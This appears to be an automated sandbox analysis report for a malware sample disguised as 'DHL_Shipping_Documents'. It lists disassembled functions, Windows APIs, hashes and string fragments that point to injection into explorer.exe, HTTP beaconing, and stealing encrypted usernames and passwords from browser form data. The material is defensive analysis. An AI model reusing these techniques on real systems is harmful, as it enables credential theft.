Instruction ID: c8924e17defb8cc39db4b7272db1fddf0e5ac4cac6ad81c06ffd216b4daf1fe3
Opcode Fuzzy Hash: a656f7b237b6c7dc51ada09d2ac08d484b713800fb41be17a573fe29c41fbb6d
Instruction Fuzzy Hash: 3E0215B1548342AFD309CF28C490A6FBBE5FFD8740F84892DB9998B254DB71E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0151B5CC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0151B69F

Strings

+, xrefs: 0151B63A
0, xrefs: 0151B64F
-, xrefs: 0151B630
0, xrefs: 0151B675

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: f27c141a2fe010a203261d3bccd99e79c43666395aaab80e9f661fec1c1263ad
Instruction ID: 5aa2f2eed079338b4ab33373ad456e7c89a355e141a8c14769f951a0c3471953
Opcode Fuzzy Hash: f27c141a2fe010a203261d3bccd99e79c43666395aaab80e9f661fec1c1263ad
Instruction Fuzzy Hash: 4681D230E012499EFF27DE6CC8907BEBBB2BF55310F1C4A49D861AF299D6349841CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01581DB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01581E1F
___swprintf_l.LIBCMT ref: 01581E42

Strings

]:%u, xrefs: 01581E39
[, xrefs: 01581DFB
%%%u, xrefs: 01581E16

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 4920db1efe98c51150c565f38f48bd1ccb9baf7bbab120cb9fae7330580f8175
Instruction ID: 91b128033d128f45ba136f9ae1e78058abecd098e58ceb97f56fc0690d96a585
Opcode Fuzzy Hash: 4920db1efe98c51150c565f38f48bd1ccb9baf7bbab120cb9fae7330580f8175
Instruction Fuzzy Hash: 56215376A0151AAFDB11EF79C880AEEBBF8FF54644F440519E905EB280E730D906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014FF560 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015401A3
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015401CD
RTL: Re-Waiting, xrefs: 01540204

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 2edc9779e169c698c2170dd66fd51decf31172db0cf3a2df3bc561de3c11491d
Instruction ID: b739fd90e54374f222e37bdfb177a7d04b6d3bfac3f5352b37e960b545c30694
Opcode Fuzzy Hash: 2edc9779e169c698c2170dd66fd51decf31172db0cf3a2df3bc561de3c11491d
Instruction Fuzzy Hash: 61E1B2316087429FE725CF28C884B5ABBE0BF84718F240A5EF6658B3E1D774D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0150BE90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01547A65
RTL: Resource at %p, xrefs: 01547A74
RTL: Re-Waiting, xrefs: 01547A92

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 1d01cc9159b6c0dec65383b8b09b0450cb36faf074b7fb35bfd77f92df391062
Instruction ID: 1106c1bfd20511e8f536e4006b8c9f17ac3c9aa6b9d847ca179f46efd97a3763
Opcode Fuzzy Hash: 1d01cc9159b6c0dec65383b8b09b0450cb36faf074b7fb35bfd77f92df391062
Instruction Fuzzy Hash: 5D41E2353007439FD722CE69C881B6BB7E5FF88710F100A1DEA6A9F680DB71E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0150B480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01547172

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0154717A
RTL: Resource at %p, xrefs: 01547189
RTL: Re-Waiting, xrefs: 015471A7

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 65c5a2d1d731241d33d72a2f7f2c5d9abeac36b725832298c06d1ed0eafa63b3
Instruction ID: 12b4c0f22d3e65d3e9bff03eef0c4cbcb7f0048b801979e7f185f4eeebe04bdc
Opcode Fuzzy Hash: 65c5a2d1d731241d33d72a2f7f2c5d9abeac36b725832298c06d1ed0eafa63b3
Instruction Fuzzy Hash: 6741F035700603ABD721CE29CC81F6AB7A6FF88714F210A19E955EF680DB31F9018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01581FD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0158205D
___swprintf_l.LIBCMT ref: 01582083

Strings

]:%u, xrefs: 0158207A
%%%u, xrefs: 01582054

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: fd7d15f1b9a19924307a315464cb62f1bd719f88726c605fb4cac2a73c17ce9b
Instruction ID: 4812f3d975e99dc6ab7b2be4b8b9d089dce1c03c82b2ab5146ca9ea36830c8a1
Opcode Fuzzy Hash: fd7d15f1b9a19924307a315464cb62f1bd719f88726c605fb4cac2a73c17ce9b
Instruction Fuzzy Hash: 9331B676600219DFDB20DF29CC40BEFBBF9FB54640F94445AE849E7140EB30AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01517D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01517E6B

Strings

-, xrefs: 01517DBD
+, xrefs: 01517DC8

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 32ee4bbd0ed843b8f8209885f148ce58b1a7ef103e8175f3e36e08e3e949613a
Instruction ID: 398ef2bb0ab6ff68633788a4feb9e72dfacbeb312687b56014faad7f5b9a004f
Opcode Fuzzy Hash: 32ee4bbd0ed843b8f8209885f148ce58b1a7ef103e8175f3e36e08e3e949613a
Instruction Fuzzy Hash: C1918571A0020A9EFB26DF6DC880ABFB7E1BF48720F54461AE965AF2C8D734D9408751

Uniqueness

Uniqueness Score: -1.00%

Function 014D9086 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 014D90D5
$, xrefs: 014D90F1

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 89e5b29e4b1dfa6fbb2a98ea4f6bd50bf9b8314a65ddc8b66518ec6781695f03
Instruction ID: aecd5a06ea151a03e481b9eaf6c29867622111cb8a7cc82b05edd051e98db0df
Opcode Fuzzy Hash: 89e5b29e4b1dfa6fbb2a98ea4f6bd50bf9b8314a65ddc8b66518ec6781695f03
Instruction Fuzzy Hash: AF811A71D006699BDB31CF54CC55BEEBBB4AF48714F0041EAEA19BB290D7709E858FA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4884, Parent PID: 1360COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	16

Executed Functions

Function 0E8FEF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0E8FF12E
setsockopt.WS2_32 ref: 0E8FF830
recv.WS2_32 ref: 0E8FF859

Strings

GET , xrefs: 0E8FF318
: cl, xrefs: 0E8FF338
Co, xrefs: 0E8FF323
&sql, xrefs: 0E8FF471
tion, xrefs: 0E8FF331
&br=, xrefs: 0E8FF509
dat=, xrefs: 0E8FF290
nnec, xrefs: 0E8FF32A
&un=, xrefs: 0E8FF4F1
ose, xrefs: 0E8FF33F

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 180a424fad873d6ecead61293e96ecfe3804247d2745cfa10024651753f72885
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 67528331614A08CFCB69EF68C4947E9B7E1FB94300F504A6EC69FD7186EE70A949CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FE232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0E8FE449

Strings

`, xrefs: 0E8FE41D

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 81c41d8a2592f990dbc42b1d8160877970a30d6dfe66e7481d58e7b420e6e87f
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 9C224D70A28A09DFDB59DF28C4986AAF7E1FB98315F40462ED55ED3260DF30E851CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FFE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E8FFE67

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 3e8d8374091622d8c0ce935e8fb280aae9cdf6a345112b747230c856665e8f2b
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 95019E30628B488F8B88EF6C948022AB7E4FBC9214F000B3EE99AC7254EB60C9414742

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FFE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E8FFE67

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 584b5505082f4f9c95714251fde269bfd150e0b6bf8c63d1f897149c88703b55
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: E301A734628B884B8744EB2C94512A6B3E5FBCE314F000B3EE59AC3251DB21D5014782

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F98C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E8F99A0

Strings

User-Agent: , xrefs: 0E8F9935, 0E8F9948
nt: , xrefs: 0E8F991E
urlmon.dll, xrefs: 0E8F9959
on.d, xrefs: 0E8F9902

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 18755e0a41aeeddd545ebae138592a9aa0690da320f5b7455f942a550a9b73e3
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2B31D171714A0C8FCF45EFA8C8847EDB7E1FB98215F40462AD54ED7240DE788A45CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F98BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E8F99A0

Strings

User-Agent: , xrefs: 0E8F9935, 0E8F9948
nt: , xrefs: 0E8F991E
urlmon.dll, xrefs: 0E8F9959
on.d, xrefs: 0E8F9902

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: d79f5e6234d2a130a0c1702bc9228cad04ef982712e5c7b9190a3c139302f358
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 6821C370614A0C8FCF05EFA8C8447EDBBE1FF98205F40461AD55AD7250DE748A45CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F5B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E8F5CCA

Strings

.dll, xrefs: 0E8F5BCD
kern, xrefs: 0E8F5B99
el32, xrefs: 0E8F5BA0

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 8665e273e83830fb2927695fd094af3342b02c9fc98103fd4f5bb34d4a58b1bd
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: C2416B70918A08CFDB94EFA8C8947AD77E0FB98300F44467AC94EDB295DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F5B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E8F5CCA

Strings

.dll, xrefs: 0E8F5BCD
kern, xrefs: 0E8F5B99
el32, xrefs: 0E8F5BA0

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: f60b82c7a369d0fbd24a6f1372247a2f7afaf9256563ab1858438ece76ed3774
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 82414B70918A08CFDB94EFA8C4987AD77F1FB98300F44457AC94EDB295DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FB72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E8FB791

Strings

ect, xrefs: 0E8FB761
conn, xrefs: 0E8FB75A

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 11899446c3df9a1d24c264b15aad90ed95b184502050fd9f6a837b73636518ca
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: BD011E70618B188FCB94EF5CE088B55B7E0FB59324F1545AED90DCB266C674DD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FB732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E8FB791

Strings

ect, xrefs: 0E8FB761
conn, xrefs: 0E8FB75A

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: e0cbe4b6299712f57066854de5b2154d3a82fc9474eaa226d2908fc618a4dc0a
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: CF012C70618A1C8FCB84EF5CE088B55B7E0FB59324F1545AEE90DCB266CA74CD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FB6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0E8FB713

Strings

send, xrefs: 0E8FB6DA

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 7987bbb992f1f6508f9a4a312d977ad425e68c5331fb027775e0ea941d733db6
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 6E011270618A188FDBC4EF1CD088B2577E0EB58314F1545AED95DCB266C670D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0E8FB5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0E8FB611

Strings

sock, xrefs: 0E8FB5D9

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 7a488b334073baa2da224a3768fb1f5dc68b859614690661849da6ca983e8772
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: A5012C70618A188FCB84EF1CE048B54BBE0FB59354F1545AEE95ECB266C7B4C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F32DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0E8F332D

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: b428a396a78e0ec49f5f11aca9690ec583d790fbb12db0e862b7c7629f90de58
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 71316B74614B09DFDB64EF2990882A9B7A1FB54300F44467FCA2DCB156CF34A864CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0E8F3412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0E8F3461

Memory Dump Source

Source File: 00000003.00000002.3461422392.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e8e0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 73831383197a06c69f0ba66984cfc5102efa87ed34816c97e041fd50c0bcd5ff
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: A2F0F630268A484FDB88EF2CD44563AF3D0FBE9214F444A3EE64DC3264DA39C9814756

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0E7AAD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

wini, xrefs: 0E7AAF72
M, xrefs: 0E7AB082
S, xrefs: 0E7AB073
dll, xrefs: 0E7AAF4C
kern, xrefs: 0E7AAF5A
32.d, xrefs: 0E7AAF0B
ll, xrefs: 0E7AAF13
net., xrefs: 0E7AAF44
user, xrefs: 0E7AAF03
.dll, xrefs: 0E7AAF2F
el32, xrefs: 0E7AAF27

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 1b8ffb2739e900243628a42da1df48239ea8af5d9b78e5f7c80fecbe50b90499
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: E1E15B74518F488FC764EF68C4987EAB7E0FB58300F904A2E959BC7255EF30A941CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AD792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

itUR, xrefs: 0E7AD85D
e, xrefs: 0E7AD8BD
encr, xrefs: 0E7AD89D
ypte, xrefs: 0E7AD8A5
Fiel, xrefs: 0E7AD884
dPas, xrefs: 0E7AD8E2
rnam, xrefs: 0E7AD8B5
dUse, xrefs: 0E7AD8AD
name, xrefs: 0E7AD87D
form, xrefs: 0E7AD84D
swor, xrefs: 0E7AD8EA
Subm, xrefs: 0E7AD855
encr, xrefs: 0E7AD8D2
guid, xrefs: 0E7AD7CE
d, xrefs: 0E7AD8F2
ypte, xrefs: 0E7AD8DA
user, xrefs: 0E7AD876

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: a39ab3143a3eba9fb26c081311b9a7bd94c9a4794d13cab284f2177f28dd0a14
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 19B16E70918B488EDB55EF68C489AEEB7F1FF98300F50491ED49AC7261EF709905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AB622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

l, xrefs: 0E7AB6AC
d, xrefs: 0E7AB6CF
n, xrefs: 0E7AB6C1
d, xrefs: 0E7AB67B
i, xrefs: 0E7AB69E
t, xrefs: 0E7AB6C8
e, xrefs: 0E7AB66D
s, xrefs: 0E7AB689
l, xrefs: 0E7AB6D6
w, xrefs: 0E7AB6B3
u, xrefs: 0E7AB661
2, xrefs: 0E7AB674
l, xrefs: 0E7AB682
d, xrefs: 0E7AB6A5
c, xrefs: 0E7AB697
p, xrefs: 0E7AB690
n, xrefs: 0E7AB6BA

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: ada00161237cf981dc990a542f3fca3d764bb0eac51a036b5cd38772ad6c6eea
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
